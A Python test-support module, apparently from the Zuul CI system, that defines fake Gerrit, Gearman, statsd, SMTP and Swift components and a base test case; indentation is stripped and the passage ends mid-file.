def addPatchset(self, files=[], large=False):
self.latest_patchset += 1
if files:
fn = files[0]
else:
fn = '%s-%s' % (self.branch.replace('/', '_'), self.number)
msg = self.subject + '-' + str(self.latest_patchset)
c = self.add_fake_change_to_repo(msg, fn, large)
ps_files = [{'file': '/COMMIT_MSG',
'type': 'ADDED'},
{'file': 'README',
'type': 'MODIFIED'}]
for f in files:
ps_files.append({'file': f, 'type': 'ADDED'})
d = {'approvals': [],
'createdOn': time.time(),
'files': ps_files,
'number': str(self.latest_patchset),
'ref': 'refs/changes/1/%s/%s' % (self.number,
self.latest_patchset),
'revision': c.hexsha,
'uploader': {'email': 'user@example.com',
'name': 'User name',
'username': 'user'}}
self.data['currentPatchSet'] = d
self.patchsets.append(d)
self.data['submitRecords'] = self.getSubmitRecords()
def getPatchsetCreatedEvent(self, patchset):
event = {"type": "patchset-created",
"change": {"project": self.project,
"branch": self.branch,
"id": "I5459869c07352a31bfb1e7a8cac379cabfcb25af",
"number": str(self.number),
"subject": self.subject,
"owner": {"name": "User Name"},
"url": "https://hostname/3"},
"patchSet": self.patchsets[patchset - 1],
"uploader": {"name": "User Name"}}
return event
def getChangeRestoredEvent(self):
event = {"type": "change-restored",
"change": {"project": self.project,
"branch": self.branch,
"id": "I5459869c07352a31bfb1e7a8cac379cabfcb25af",
"number": str(self.number),
"subject": self.subject,
"owner": {"name": "User Name"},
"url": "https://hostname/3"},
"restorer": {"name": "User Name"},
"patchSet": self.patchsets[-1],
"reason": ""}
return event
def getChangeAbandonedEvent(self):
event = {"type": "change-abandoned",
"change": {"project": self.project,
"branch": self.branch,
"id": "I5459869c07352a31bfb1e7a8cac379cabfcb25af",
"number": str(self.number),
"subject": self.subject,
"owner": {"name": "User Name"},
"url": "https://hostname/3"},
"abandoner": {"name": "User Name"},
"patchSet": self.patchsets[-1],
"reason": ""}
return event
def getChangeCommentEvent(self, patchset):
event = {"type": "comment-added",
"change": {"project": self.project,
"branch": self.branch,
"id": "I5459869c07352a31bfb1e7a8cac379cabfcb25af",
"number": str(self.number),
"subject": self.subject,
"owner": {"name": "User Name"},
"url": "https://hostname/3"},
"patchSet": self.patchsets[patchset - 1],
"author": {"name": "User Name"},
"approvals": [{"type": "Code-Review",
"description": "Code-Review",
"value": "0"}],
"comment": "This is a comment"}
return event
def getRefUpdatedEvent(self):
path = os.path.join(self.upstream_root, self.project)
repo = git.Repo(path)
oldrev = repo.heads[self.branch].commit.hexsha
event = {
"type": "ref-updated",
"submitter": {
"name": "User Name",
},
"refUpdate": {
"oldRev": oldrev,
"newRev": self.patchsets[-1]['revision'],
"refName": self.branch,
"project": self.project,
}
}
return event
def addApproval(self, category, value, username='reviewer_john',
granted_on=None, message=''):
if not granted_on:
granted_on = time.time()
approval = {
'description': self.categories_translation[category],
'type': self.categories_translation[category],
'value': str(value),
'by': {
'username': username,
'email': username + '@example.com',
},
'grantedOn': int(granted_on)
}
for i, x in enumerate(self.patchsets[-1]['approvals'][:]):
if x['by']['username'] == username and \
x['type'] == self.categories_translation[category]:
del self.patchsets[-1]['approvals'][i]
self.patchsets[-1]['approvals'].append(approval)
event = {'approvals': [approval],
'author': {'email': 'author@example.com',
'name': 'Patchset Author',
'username': 'author_phil'},
'change': {'branch': self.branch,
'id': 'Iaa69c46accf97d0598111724a38250ae76a22c87',
'number': str(self.number),
'owner': {'email': 'owner@example.com',
'name': 'Change Owner',
'username': 'owner_jane'},
'project': self.project,
'subject': self.subject,
'topic': 'master',
'url': 'https://hostname/459'},
'comment': message,
'patchSet': self.patchsets[-1],
'type': 'comment-added'}
self.data['submitRecords'] = self.getSubmitRecords()
return json.loads(json.dumps(event))
def getSubmitRecords(self):
status = {}
for cat in self.categories.keys():
status[cat] = 0
for a in self.patchsets[-1]['approvals']:
cur = status[a['type']]
cat_min, cat_max = self.categories[a['type']][1:]
new = int(a['value'])
if new == cat_min:
cur = new
elif abs(new) > abs(cur):
cur = new
status[a['type']] = cur
labels = []
ok = True
for typ, cat in self.categories.items():
cur = status[typ]
cat_min, cat_max = cat[1:]
if cur == cat_min:
value = 'REJECT'
ok = False
elif cur == cat_max:
value = 'OK'
else:
value = 'NEED'
ok = False
labels.append({'label': cat[0], 'status': value})
if ok:
return [{'status': 'OK'}]
return [{'status': 'NOT_READY',
'labels': labels}]
def setDependsOn(self, other, patchset):
self.depends_on_change = other
d = {'id': other.data['id'],
'number': other.data['number'],
'ref': other.patchsets[patchset - 1]['ref']
}
self.data['dependsOn'] = [d]
other.needed_by_changes.append(self)
needed = other.data.get('neededBy', [])
d = {'id': self.data['id'],
'number': self.data['number'],
'ref': self.patchsets[patchset - 1]['ref'],
'revision': self.patchsets[patchset - 1]['revision']
}
needed.append(d)
other.data['neededBy'] = needed
def query(self):
self.queried += 1
d = self.data.get('dependsOn')
if d:
d = d[0]
if (self.depends_on_change.patchsets[-1]['ref'] == d['ref']):
d['isCurrentPatchSet'] = True
else:
d['isCurrentPatchSet'] = False
return json.loads(json.dumps(self.data))
def setMerged(self):
if (self.depends_on_change and
self.depends_on_change.data['status'] != 'MERGED'):
return
if self.fail_merge:
return
self.data['status'] = 'MERGED'
self.open = False
path = os.path.join(self.upstream_root, self.project)
repo = git.Repo(path)
repo.heads[self.branch].commit = \
repo.commit(self.patchsets[-1]['revision'])
def setReported(self):
self.reported += 1
class FakeGerritConnection(zuul.connection.gerrit.GerritConnection):
log = logging.getLogger("zuul.test.FakeGerritConnection")
def __init__(self, connection_name, connection_config,
changes_db=None, queues_db=None, upstream_root=None):
super(FakeGerritConnection, self).__init__(connection_name,
connection_config)
self.event_queue = queues_db
self.fixture_dir = os.path.join(FIXTURE_DIR, 'gerrit')
self.change_number = 0
self.changes = changes_db
self.queries = []
self.upstream_root = upstream_root
def addFakeChange(self, project, branch, subject, status='NEW'):
self.change_number += 1
c = FakeChange(self, self.change_number, project, branch, subject,
upstream_root=self.upstream_root,
status=status)
self.changes[self.change_number] = c
return c
def review(self, project, changeid, message, action):
number, ps = changeid.split(',')
change = self.changes[int(number)]
# Add the approval back onto the change (ie simulate what gerrit would
# do).
# Usually when zuul leaves a review it'll create a feedback loop where
# zuul's review enters another gerrit event (which is then picked up by
# zuul). However, we can't mimic this behaviour (by adding this
# approval event into the queue) as it stops jobs from checking what
# happens before this event is triggered. If a job needs to see what
# happens they can add their own verified event into the queue.
# Nevertheless, we can update change with the new review in gerrit.
for cat in ['CRVW', 'VRFY', 'APRV']:
if cat in action:
change.addApproval(cat, action[cat], username=self.user)
if 'label' in action:
parts = action['label'].split('=')
change.addApproval(parts[0], parts[2], username=self.user)
change.messages.append(message)
if 'submit' in action:
change.setMerged()
if message:
change.setReported()
def query(self, number):
change = self.changes.get(int(number))
if change:
return change.query()
return {}
def simpleQuery(self, query):
self.log.debug("simpleQuery: %s" % query)
self.queries.append(query)
if query.startswith('change:'):
# Query a specific changeid
changeid = query[len('change:'):]
l = [change.query() for change in self.changes.values()
if change.data['id'] == changeid]
elif query.startswith('message:'):
# Query the content of a commit message
msg = query[len('message:'):].strip()
l = [change.query() for change in self.changes.values()
if msg in change.data['commitMessage']]
else:
# Query all open changes
l = [change.query() for change in self.changes.values()]
return l
def _start_watcher_thread(self, *args, **kw):
pass
def getGitUrl(self, project):
return os.path.join(self.upstream_root, project.name)
class BuildHistory(object):
def __init__(self, **kw):
self.__dict__.update(kw)
def __repr__(self):
return ("<Completed build, result: %s name: %s #%s changes: %s>" %
(self.result, self.name, self.number, self.changes))
class FakeURLOpener(object):
def __init__(self, upstream_root, url):
self.upstream_root = upstream_root
self.url = url
def read(self):
res = urllib.parse.urlparse(self.url)
path = res.path
project = '/'.join(path.split('/')[2:-2])
ret = '001e# service=git-upload-pack\n'
ret += ('000000a31270149696713ba7e06f1beb760f20d359c4abed HEAD\x00'
'multi_ack thin-pack side-band side-band-64k ofs-delta '
'shallow no-progress include-tag multi_ack_detailed no-done\n')
path = os.path.join(self.upstream_root, project)
repo = git.Repo(path)
for ref in repo.refs:
r = ref.object.hexsha + ' ' + ref.path + '\n'
ret += '%04x%s' % (len(r) + 4, r)
ret += '0000'
return ret
class FakeStatsd(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.daemon = True
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.bind(('', 0))
self.port = self.sock.getsockname()[1]
self.wake_read, self.wake_write = os.pipe()
self.stats = []
def run(self):
while True:
poll = select.poll()
poll.register(self.sock, select.POLLIN)
poll.register(self.wake_read, select.POLLIN)
ret = poll.poll()
for (fd, event) in ret:
if fd == self.sock.fileno():
data = self.sock.recvfrom(1024)
if not data:
return
self.stats.append(data[0])
if fd == self.wake_read:
return
def stop(self):
os.write(self.wake_write, '1\n')
class FakeBuild(threading.Thread):
log = logging.getLogger("zuul.test")
def __init__(self, worker, job, number, node):
threading.Thread.__init__(self)
self.daemon = True
self.worker = worker
self.job = job
self.name = job.name.split(':')[1]
self.number = number
self.node = node
self.parameters = json.loads(job.arguments)
self.unique = self.parameters['ZUUL_UUID']
self.wait_condition = threading.Condition()
self.waiting = False
self.aborted = False
self.requeue = False
self.created = time.time()
self.description = ''
self.run_error = False
def release(self):
self.wait_condition.acquire()
self.wait_condition.notify()
self.waiting = False
self.log.debug("Build %s released" % self.unique)
self.wait_condition.release()
def isWaiting(self):
self.wait_condition.acquire()
if self.waiting:
ret = True
else:
ret = False
self.wait_condition.release()
return ret
def _wait(self):
self.wait_condition.acquire()
self.waiting = True
self.log.debug("Build %s waiting" % self.unique)
self.wait_condition.wait()
self.wait_condition.release()
def run(self):
data = {
'url': 'https://server/job/%s/%s/' % (self.name, self.number),
'name': self.name,
'number': self.number,
'manager': self.worker.worker_id,
'worker_name': 'My Worker',
'worker_hostname': 'localhost',
'worker_ips': ['127.0.0.1', '192.168.1.1'],
'worker_fqdn': 'zuul.example.org',
'worker_program': 'FakeBuilder',
'worker_version': 'v1.1',
'worker_extra': {'something': 'else'}
}
self.log.debug('Running build %s' % self.unique)
self.job.sendWorkData(json.dumps(data))
self.log.debug('Sent WorkData packet with %s' % json.dumps(data))
self.job.sendWorkStatus(0, 100)
if self.worker.hold_jobs_in_build:
self.log.debug('Holding build %s' % self.unique)
self._wait()
self.log.debug("Build %s continuing" % self.unique)
self.worker.lock.acquire()
result = 'SUCCESS'
if (('ZUUL_REF' in self.parameters) and
self.worker.shouldFailTest(self.name,
self.parameters['ZUUL_REF'])):
result = 'FAILURE'
if self.aborted:
result = 'ABORTED'
if self.requeue:
result = None
if self.run_error:
work_fail = True
result = 'RUN_ERROR'
else:
data['result'] = result
data['node_labels'] = ['bare-necessities']
data['node_name'] = 'foo'
work_fail = False
changes = None
if 'ZUUL_CHANGE_IDS' in self.parameters:
changes = self.parameters['ZUUL_CHANGE_IDS']
self.worker.build_history.append(
BuildHistory(name=self.name, number=self.number,
result=result, changes=changes, node=self.node,
uuid=self.unique, description=self.description,
parameters=self.parameters,
pipeline=self.parameters['ZUUL_PIPELINE'])
)
self.job.sendWorkData(json.dumps(data))
if work_fail:
self.job.sendWorkFail()
else:
self.job.sendWorkComplete(json.dumps(data))
del self.worker.gearman_jobs[self.job.unique]
self.worker.running_builds.remove(self)
self.worker.lock.release()
class FakeWorker(gear.Worker):
def __init__(self, worker_id, test):
super(FakeWorker, self).__init__(worker_id)
self.gearman_jobs = {}
self.build_history = []
self.running_builds = []
self.build_counter = 0
self.fail_tests = {}
self.test = test
self.hold_jobs_in_build = False
self.lock = threading.Lock()
self.__work_thread = threading.Thread(target=self.work)
self.__work_thread.daemon = True
self.__work_thread.start()
def handleJob(self, job):
parts = job.name.split(":")
cmd = parts[0]
name = parts[1]
if len(parts) > 2:
node = parts[2]
else:
node = None
if cmd == 'build':
self.handleBuild(job, name, node)
elif cmd == 'stop':
self.handleStop(job, name)
elif cmd == 'set_description':
self.handleSetDescription(job, name)
def handleBuild(self, job, name, node):
build = FakeBuild(self, job, self.build_counter, node)
job.build = build
self.gearman_jobs[job.unique] = job
self.build_counter += 1
self.running_builds.append(build)
build.start()
def handleStop(self, job, name):
self.log.debug("handle stop")
parameters = json.loads(job.arguments)
name = parameters['name']
number = parameters['number']
for build in self.running_builds:
if build.name == name and build.number == number:
build.aborted = True
build.release()
job.sendWorkComplete()
return
job.sendWorkFail()
def handleSetDescription(self, job, name):
self.log.debug("handle set description")
parameters = json.loads(job.arguments)
name = parameters['name']
number = parameters['number']
descr = parameters['html_description']
for build in self.running_builds:
if build.name == name and build.number == number:
build.description = descr
job.sendWorkComplete()
return
for build in self.build_history:
if build.name == name and build.number == number:
build.description = descr
job.sendWorkComplete()
return
job.sendWorkFail()
def work(self):
while self.running:
try:
job = self.getJob()
except gear.InterruptedError:
continue
try:
self.handleJob(job)
except:
self.log.exception("Worker exception:")
def addFailTest(self, name, change):
l = self.fail_tests.get(name, [])
l.append(change)
self.fail_tests[name] = l
def shouldFailTest(self, name, ref):
l = self.fail_tests.get(name, [])
for change in l:
if self.test.ref_has_change(ref, change):
return True
return False
def release(self, regex=None):
builds = self.running_builds[:]
self.log.debug("releasing build %s (%s)" % (regex,
len(self.running_builds)))
for build in builds:
if not regex or re.match(regex, build.name):
self.log.debug("releasing build %s" %
(build.parameters['ZUUL_UUID']))
build.release()
else:
self.log.debug("not releasing build %s" %
(build.parameters['ZUUL_UUID']))
self.log.debug("done releasing builds %s (%s)" %
(regex, len(self.running_builds)))
class FakeGearmanServer(gear.Server):
def __init__(self):
self.hold_jobs_in_queue = False
super(FakeGearmanServer, self).__init__(0)
def getJobForConnection(self, connection, peek=False):
for queue in [self.high_queue, self.normal_queue, self.low_queue]:
for job in queue:
if not hasattr(job, 'waiting'):
if job.name.startswith('build:'):
job.waiting = self.hold_jobs_in_queue
else:
job.waiting = False
if job.waiting:
continue
if job.name in connection.functions:
if not peek:
queue.remove(job)
connection.related_jobs[job.handle] = job
job.worker_connection = connection
job.running = True
return job
return None
def release(self, regex=None):
released = False
qlen = (len(self.high_queue) + len(self.normal_queue) +
len(self.low_queue))
self.log.debug("releasing queued job %s (%s)" % (regex, qlen))
for job in self.getQueue():
cmd, name = job.name.split(':')
if cmd != 'build':
continue
if not regex or re.match(regex, name):
self.log.debug("releasing queued job %s" %
job.unique)
job.waiting = False
released = True
else:
self.log.debug("not releasing queued job %s" %
job.unique)
if released:
self.wakeConnections()
qlen = (len(self.high_queue) + len(self.normal_queue) +
len(self.low_queue))
self.log.debug("done releasing queued jobs %s (%s)" % (regex, qlen))
class FakeSMTP(object):
log = logging.getLogger('zuul.FakeSMTP')
def __init__(self, messages, server, port):
self.server = server
self.port = port
self.messages = messages
def sendmail(self, from_email, to_email, msg):
self.log.info("Sending email from %s, to %s, with msg %s" % (
from_email, to_email, msg))
headers = msg.split('\n\n', 1)[0]
body = msg.split('\n\n', 1)[1]
self.messages.append(dict(
from_email=from_email,
to_email=to_email,
msg=msg,
headers=headers,
body=body,
))
return True
def quit(self):
return True
class FakeSwiftClientConnection(swiftclient.client.Connection):
def post_account(self, headers):
# Do nothing
pass
def get_auth(self):
# Returns endpoint and (unused) auth token
endpoint = os.path.join('https://storage.example.org', 'V1',
'AUTH_account')
return endpoint, ''
class MySQLSchemaFixture(fixtures.Fixture):
def setUp(self):
super(MySQLSchemaFixture, self).setUp()
random_bits = ''.join(random.choice(string.ascii_lowercase +
string.ascii_uppercase)
for x in range(8))
self.name = '%s_%s' % (random_bits, os.getpid())
self.passwd = uuid.uuid4().hex
db = pymysql.connect(host="localhost",
user="openstack_citest",
passwd="openstack_citest",
db="openstack_citest")
cur = db.cursor()
cur.execute("create database %s" % self.name)
cur.execute(
"grant all on %s.* to '%s'@'localhost' identified by '%s'" %
(self.name, self.name, self.passwd))
cur.execute("flush privileges")
self.dburi = 'mysql+pymysql://%s:%s@localhost/%s' % (self.name,
self.passwd,
self.name)
self.addDetail('dburi', testtools.content.text_content(self.dburi))
self.addCleanup(self.cleanup)
def cleanup(self):
db = pymysql.connect(host="localhost",
user="openstack_citest",
passwd="openstack_citest",
db="openstack_citest")
cur = db.cursor()
cur.execute("drop database %s" % self.name)
cur.execute("drop user '%s'@'localhost'" % self.name)
cur.execute("flush privileges")
class BaseTestCase(testtools.TestCase):
log = logging.getLogger("zuul.test")
def setUp(self):
super(BaseTestCase, self).setUp()
test_timeout = os.environ.get('OS_TEST_TIMEOUT', 0)
try:
test_timeout = int(test_timeout)
except ValueError:
# If timeout value is invalid do not set a timeout.
test_timeout = 0
if test_timeout > 0:
self.useFixture(fixtures.Timeout(test_timeout, gentle=False))
if (os.environ.get('OS_STDOUT_CAPTURE') == 'True' or
os.environ.get('OS_STDOUT_CAPTURE') == '1'):
stdout = self.useFixture(fixtures.StringStream('stdout')).stream
self.useFixture(fixtures.MonkeyPatch('sys.stdout', stdout))
if (os.environ.get('OS_STDERR_CAPTURE') == 'True' or
os.environ.get('OS_STDERR_CAPTURE') == '1'):
stderr = self.useFixture(fixtures.StringStream('stderr')).stream
self.useFixture(fixtures.MonkeyPatch('sys.stderr', stderr))
if (os.environ.get('OS_LOG_CAPTURE') == 'True' or
os.environ.get('OS_LOG_CAPTURE') == '1'):
log_level = logging.DEBUG
if os.environ.get('OS_LOG_LEVEL') == 'DEBUG':
log_level = logging.DEBUG
elif os.environ.get('OS_LOG_LEVEL') == 'INFO':
log_level = logging.INFO
elif os.environ.get('OS_LOG_LEVEL') == 'WARNING':
log_level = logging.WARNING
elif os.environ.get('OS_LOG_LEVEL') == 'ERROR':
log_level = logging.ERROR
elif os.environ.get('OS_LOG_LEVEL') == 'CRITICAL':
log_level = logging.CRITICAL
self.useFixture(fixtures.FakeLogger(
level=log_level,
format='%(asctime)s %(name)-32s '
'%(levelname)-8s %(message)s'))
# NOTE(notmorgan): Extract logging overrides for specific libraries
# from the OS_LOG_DEFAULTS env and create FakeLogger fixtures for
# each. This is used to limit the output during test runs from
# libraries that zuul depends on such as gear.
log_defaults_from_env = os.environ.get('OS_LOG_DEFAULTS')
if log_defaults_from_env:
for default in log_defaults_from_env.split(','):
try:
name, level_str = default.split('=', 1)
level = getattr(logging, level_str, logging.DEBUG)
self.useFixture(fixtures.FakeLogger(
name=name,
level=level,
format='%(asctime)s %(name)-32s '
'%(levelname)-8s %(message)s'))
except ValueError:
# NOTE(notmorgan): Invalid format of the log default,
# skip and don't try and apply a logger for the
# specified module
pass
class ZuulTestCase(BaseTestCase):
def setUp(self):
super(ZuulTestCase, self).setUp()
if USE_TEMPDIR:
tmp_root = self.useFixture(fixtures.TempDir(
rootdir=os.environ.get("ZUUL_TEST_ROOT"))
).path
else:
tmp_root = os.environ.get("ZUUL_TEST_ROOT")
self.test_root = os.path.join(tmp_root, "zuul-test")
self.upstream_root = os.path.join(self.test_root, "upstream")
self.git_root = os.path.join(self.test_root, "git")
self.state_root = os.path.join(self.test_root, "lib")
if os.path.exists(self.test_root):
shutil.rmtree(self.test_root)
os.makedirs(self.test_root)
os.makedirs(self.upstream_root)
os.makedirs(self.state_root)
# Make per test copy of Configuration.
self.setup_config()
self.config.set('zuul', 'layout_config',
os.path.join(FIXTURE_DIR,
self.config.get('zuul', 'layout_config')))
self.config.set('merger', 'git_dir', self.git_root)
self.config.set('zuul', 'state_dir', self.state_root)
# For each project in config:
self.init_repo("org/project")
self.init_repo("org/project1")
self.init_repo("org/project2")
self.init_repo("org/project3")
self.init_repo("org/project4")
self.init_repo("org/project5")
self.init_repo("org/project6")
self.init_repo("org/one-job-project")
self.init_repo("org/nonvoting-project")
self.init_repo("org/templated-project")
self.init_repo("org/layered-project")
self.init_repo("org/node-project")
self.init_repo("org/conflict-project")
self.init_repo("org/noop-project")
self.init_repo("org/experimental-project")
self.init_repo("org/no-jobs-project")
self.statsd = FakeStatsd()
# note, use 127.0.0.1 rather than localhost to avoid getting ipv6
# see: https://github.com/jsocol/pystatsd/issues/61
os.environ['STATSD_HOST'] = '127.0.0.1'
os.environ['STATSD_PORT'] = str(self.statsd.port)
self.statsd.start()
# the statsd client object is configured in the statsd module import
reload_module(statsd)
reload_module(zuul.scheduler)
self.gearman_server = FakeGearmanServer()
self.config.set('gearman', 'port', str(self.gearman_server.port))
self.worker = FakeWorker('fake_worker', self)
self.worker.addServer('127.0.0.1', self.gearman_server.port)
self.gearman_server.worker = self.worker
zuul.source.gerrit.GerritSource.replication_timeout = 1.5
zuul.source.gerrit.GerritSource.replication_retry_interval = 0.5
zuul.connection.gerrit.GerritEventConnector.delay = 0.0
self.sched = zuul.scheduler.Scheduler(self.config)
self.useFixture(fixtures.MonkeyPatch('swiftclient.client.Connection',
FakeSwiftClientConnection))
self.swift = zuul.lib.swift.Swift(self.config)
self.event_queues = [
self.sched.result_event_queue,
self.sched.trigger_event_queue
]
self.configure_connections()
self.sched.registerConnections(self.connections)
def URLOpenerFactory(*args, **kw):
if isinstance(args[0], urllib.request.Request):
return old_urlopen(*args, **kw)
return FakeURLOpener(self.upstream_root, *args, **kw)
old_urlopen = urllib.request.urlopen
urllib.request.urlopen = URLOpenerFactory
self.merge_server = zuul.merger.server.MergeServer(self.config,
self.connections)
self.merge_server.start()
self.launcher = zuul.launcher.gearman.Gearman(self.config, self.sched,
self.swift)
self.merge_client = zuul.merger.client.MergeClient(
self.config, self.sched)
self.sched.setLauncher(self.launcher)
self.sched.setMerger(self.merge_client)
self.webapp = zuul.webapp.WebApp(
self.sched, port=0, listen_address='127.0.0.1')
self.rpc = zuul.rpclistener.RPCListener(self.config, self.sched)
self.sched.start()
self.sched.reconfigure(self.config)
self.sched.resume()
self.webapp.start()
self.rpc.start()
self.launcher.gearman.waitForServer()
self.registerJobs()
self.builds = self.worker.running_builds
self.history = self.worker.build_history
self.addCleanup(self.assertFinalState)
self.addCleanup(self.shutdown)
def configure_connections(self):
# TODO(jhesketh): This should come from lib.connections for better
# coverage
# Register connections from the config
self.smtp_messages = []
def FakeSMTPFactory(*args, **kw):
args = [self.smtp_messages] + list(args)
return FakeSMTP(*args, **kw)
self.useFixture(fixtures.MonkeyPatch('smtplib.SMTP', FakeSMTPFactory))
# Set a changes database so multiple FakeGerrit's can report back to
# a virtual canonical database given by the configured hostname
self.gerrit_changes_dbs = {}
self.gerrit_queues_dbs = {}
self.connections = {}
for section_name in self.config.sections():
con_match = re.match(r'^connection ([\'\"]?)(.*)(\1)$',
section_name, re.I)
if not con_match:
continue
con_name = con_match.group(2)
con_config = dict(self.config.items(section_name))
if 'driver' not in con_config:
raise Exception("No driver specified for connection %s."
% con_name)
con_driver = con_config['driver']
# TODO(jhesketh): load the required class automatically
if con_driver == 'gerrit':
if con_config['server'] not in self.gerrit_changes_dbs.keys():
self.gerrit_changes_dbs[con_config['server']] = {}
if con_config['server'] not in self.gerrit_queues_dbs.keys():
self.gerrit_queues_dbs[con_config['server']] = \
Queue.Queue()
self.event_queues.append(
self.gerrit_queues_dbs[con_config['server']])
self.connections[con_name] = FakeGerritConnection(
con_name, con_config,
changes_db=self.gerrit_changes_dbs[con_config['server']],
queues_db=self.gerrit_queues_dbs[con_config['server']],
upstream_root=self.upstream_root
)
setattr(self, 'fake_' + con_name, self.connections[con_name])
elif con_driver == 'smtp':
self.connections[con_name] = \
zuul.connection.smtp.SMTPConnection(con_name, con_config)
elif con_driver == 'sql':
self.connections[con_name] = \
zuul.connection.sql.SQLConnection(con_name, con_config)
else:
raise Exception("Unknown driver, %s, for connection %s"
% (con_config['driver'], con_name))
# If the [gerrit] or [smtp] sections still exist, load them in as a
# connection named 'gerrit' or 'smtp' respectfully
if 'gerrit' in self.config.sections():
self.gerrit_changes_dbs['gerrit'] = {}
self.gerrit_queues_dbs['gerrit'] = Queue.Queue()
self.event_queues.append(self.gerrit_queues_dbs['gerrit'])
self.connections['gerrit'] = FakeGerritConnection(
'_legacy_gerrit', dict(self.config.items('gerrit')),
changes_db=self.gerrit_changes_dbs['gerrit'],
queues_db=self.gerrit_queues_dbs['gerrit'])
if 'smtp' in self.config.sections():
self.connections['smtp'] = \
zuul.connection.smtp.SMTPConnection(
'_legacy_smtp', dict(self.config.items('smtp')))
def setup_config(self, config_file='zuul.conf'):
"""Per test config object. Override to set different config."""
self.config = ConfigParser.ConfigParser()
self.config.read(os.path.join(FIXTURE_DIR, config_file))
def assertFinalState(self):
# Make sure that git.Repo objects have been garbage collected.
repos = []
gc.collect()
for obj in gc.get_objects():
if isinstance(obj, git.Repo):
repos.append(obj)
self.assertEqual(len(repos), 0)
self.assertEmptyQueues()
for pipeline in self.sched.layout.pipelines.values():
if isinstance(pipeline.manager,
zuul.scheduler.IndependentPipelineManager):
self.assertEqual(len(pipeline.queues), 0)
def shutdown(self):
self.log.debug("Shutting down after tests")
self.launcher.stop()
self.merge_server.stop()
self.merge_server.join()
self.merge_client.stop()
self.worker.shutdown()
self.sched.stop()
self.sched.join()
self.statsd.stop()
self.statsd.join()
self.webapp.stop()
self.webapp.join()
self.rpc.stop()
self.rpc.join()
self.gearman_server.shutdown()
threads = threading.enumerate()
if len(threads) > 1:
self.log.error("More than one thread is running: %s" % threads)
def init_repo(self, project):
parts = project.split('/')
path = os.path.join(self.upstream_root, *parts[:-1])
if not os.path.exists(path):
os.makedirs(path)
path = os.path.join(self.upstream_root, project)
repo = git.Repo.init(path)
repo.config_writer().set_value('user', 'email', 'user@example.com')
repo.config_writer().set_value('user', 'name', 'User Name')
repo.config_writer().write()
fn = os.path.join(path, 'README')
f = open(fn, 'w')
f.write("test\n")
f.close()
repo.index.add([fn])
repo.index.commit('initial commit')
master = repo.create_head('master')
repo.create_tag('init')
repo.head.reference = master
zuul.merger.merger.reset_repo_to_head(repo)
repo.git.clean('-x', '-f', '-d')
self.create_branch(project, 'mp')
def create_branch(self, project, branch):
path = os.path.join(self.upstream_root, project)
repo = git.Repo.init(path)
fn = os.path.join(path, 'README')
branch_head = repo.create_head(branch)
repo.head.reference = branch_head
f = open(fn, 'a')
f.write("test %s\n" % branch)
f.close()
repo.index.add([fn])
repo.index.commit('%s commit' % branch)
repo.head.reference = repo.heads['master']
zuul.merger.merger.reset_repo_to_head(repo)
repo.git.clean('-x', '-f', '-d')
def create_commit(self, project):
path = os.path.join(self.upstream_root, project)
repo = git.Repo(path)
repo.head.reference = repo.heads['master']
file_name = os.path.join(path, 'README')
with open(file_name, 'a') as f:
f.write('creating fake commit\n')
repo.index.add([file_name])
commit = repo.index.commit('Creating a fake commit')
return commit.hexsha
def ref_has_change(self, ref, change):
path = os.path.join(self.git_root, change.project)
repo = git.Repo(path)
try:
for commit in repo.iter_commits(ref):
if commit.message.strip() == ('%s-1' % change.subject):
return True
except GitCommandError:
pass
return False
def job_has_changes(self, *args):
job = args[0]
commits = args[1:]
if isinstance(job, FakeBuild):
parameters = job.parameters
else:
parameters = json.loads(job.arguments)
project = parameters['ZUUL_PROJECT']
path = os.path.join(self.git_root, project)
repo = git.Repo(path)
ref = parameters['ZUUL_REF']
sha = parameters['ZUUL_COMMIT']
repo_messages = [c.message.strip() for c in repo.iter_commits(ref)]
repo_shas = [c.hexsha for c in repo.iter_commits(ref)]
commit_messages = ['%s-1' % commit.subject for commit in commits]
self.log.debug("Checking if job %s has changes; commit_messages %s;"
" repo_messages %s; sha %s" % (job, commit_messages,
repo_messages, sha))
for msg in commit_messages:
if msg not in repo_messages:
self.log.debug(" messages do not match")
return False
if repo_shas[0] != sha:
self.log.debug(" sha does not match")
return False
self.log.debug(" OK")
return True
def registerJobs(self):
count = 0
for job in self.sched.layout.jobs.keys():
self.worker.registerFunction('build:' + job)
count += 1
self.worker.registerFunction('stop:' + self.worker.worker_id)
count += 1
while len(self.gearman_server.functions) < count:
time.sleep(0)
def orderedRelease(self):
# Run one build at a time to ensure non-race order:
while len(self.builds):
self.release(self.builds[0])
self.waitUntilSettled()
def release(self, job):
if isinstance(job, FakeBuild):
job.release()
else:
job.waiting = False
self.log.debug("Queued job %s released" % job.unique)
self.gearman_server.wakeConnections()
def getParameter(self, job, name):
if isinstance(job, FakeBuild):
return job.parameters[name]
else:
parameters = json.loads(job.arguments)
return parameters[name]
def resetGearmanServer(self):
self.worker.setFunctions([])
while True:
done = True
for connection in self.gearman_server.active_connections:
if (connection.functions and
connection.client_id not in ['Zuul RPC Listener',
'Zuul Merger']):
done = False
if done:
break
time.sleep(0)
self.gearman_server.functions = set()
self.rpc.register()
self.merge_server.register()
def haveAllBuildsReported(self):
# See if Zuul is waiting on a meta job to complete
if self.launcher.meta_jobs:
return False
# Find out if every build that the worker has completed has been
# reported back to Zuul. If it hasn't then that means a Gearman
# event is still in transit and the system is not stable.
for build in self.worker.build_history:
zbuild = self.launcher.builds.get(build.uuid)
if not zbuild:
# It has already been reported
continue
# It hasn't been reported yet.
return False
# Make sure that none of the worker connections are in GRAB_WAIT
for connection in self.worker.active_connections:
if connection.state == 'GRAB_WAIT':
return False
return True
def areAllBuildsWaiting(self):
builds = self.launcher.builds.values()
for build in builds:
client_job = None
for conn in self.launcher.gearman.active_connections:
for j in conn.related_jobs.values():
if j.unique == build.uuid:
client_job = j
break
if not client_job:
self.log.debug("%s is not known to the gearman client" %
build)
return False
if not client_job.handle:
self.log.debug("%s has no handle" % client_job)
return False
server_job = self.gearman_server.jobs.get(client_job.handle)
if not server_job:
self.log.debug("%s is not known to the gearman server" %
client_job)
return False
if not hasattr(server_job, 'waiting'):
self.log.debug("%s is being enqueued" % server_job)
return False
if server_job.waiting:
continue
worker_job = self.worker.gearman_jobs.get(server_job.unique)
if worker_job:
if build.number is None:
self.log.debug("%s has not reported start" % worker_job)
return False
if worker_job.build.isWaiting():
continue
else:
self.log.debug("%s is running" % worker_job)
return False
else:
self.log.debug("%s is unassigned" % server_job)
return False
return True
def eventQueuesEmpty(self):
for queue in self.event_queues:
yield queue.empty()
def eventQueuesJoin(self):
